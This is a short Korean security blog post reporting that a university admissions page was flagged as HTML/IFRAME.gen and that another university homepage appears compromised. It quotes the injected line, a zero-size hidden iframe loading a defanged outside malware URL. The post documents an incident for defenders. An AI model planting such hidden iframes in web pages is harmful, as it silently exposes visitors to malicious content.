| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | ||||||
| 2 | 3 | 4 | 5 | 6 | 7 | 8 |
| 9 | 10 | 11 | 12 | 13 | 14 | 15 |
| 16 | 17 | 18 | 19 | 20 | 21 | 22 |
| 23 | 24 | 25 | 26 | 27 | 28 |
Tags
- shell_gpt
- 모의해킹
- react
- 허리디스크
- 보이스피싱 #대검찰청 #명의도용 #비밀번호 #계좌번호 #공공기관 #가짜검찰청
- 중고나라
- 거래사기
- Sequoia
- XSS
- speed-measure-webpack-plugin
- 취약점
- open redirect
- 로맨스스캠
- NUGU
- 채팅환전사기
- 많다..
- ue4dumper
- CryptoJS
- MongoDB #NoSQL #CreateUser #DropUser #mongod #mognod.conf
- 변태는
- Malware Sample
- CJ대한통운 #쿠팡 #통관번호오류 #통관고유번호오류 #안주원팀장 #모건인베스트
- 안전결제
- 네이버카페
- intelmac
- Frida
- 척추관협착증
- self-signed
- ssrf
- esbuild
Archives
- Today
- Total
annyoung
가톨릭대학교 입학처 악성코드 경유지로 이용? 본문
| 2015-11-24 03:18:29 | http://ipsi.catholic.ac.kr/main/index.asp | 59835DC727054D056A8E0E3914989598 | 211.174.52.78 | KR | HTML/IFRAME.gen |
악성코드 경유지로 이용된 건지는 확실치는 않으나 HTML/IFRAME generate로 탐지가 되었다. 이유가 있으니 탐지했겠지. 샘플 입수는 못했으므로 자세한 내용은 없음..
추가내용))
가톨릭대학교 말고도 카이스트 twilight 홈페이지에서도 침해사고(?)의 흔적이 보인다.
<iframe src="hxxp://ro521.com/test.htm" width=0 height=0></iframe> |
아마 가톨릭대학교 입학처도 ro521.com이 iframe 박혀 있었던 것으로 추정된다.
'분석생활' 카테고리의 다른 글
| UPX 3.0으로 패킹된 악성코드 언패킹 (0) | 2015.12.15 |
|---|---|
| ro521.com/test.htm 제로보드 침해사고 (0) | 2015.11.25 |
| [마스킹 처리된 게시물] ****에서 파밍 악성코드 유포지로 활용중 (0) | 2015.11.25 |
| [MUP] PE-PACK v1.0 by ANAKiN 1998 (0) | 2015.11.24 |
| 토렌트를 통한 악성코드 유포 (12) | 2015.11.18 |
'분석생활' Related Articles
more
Comments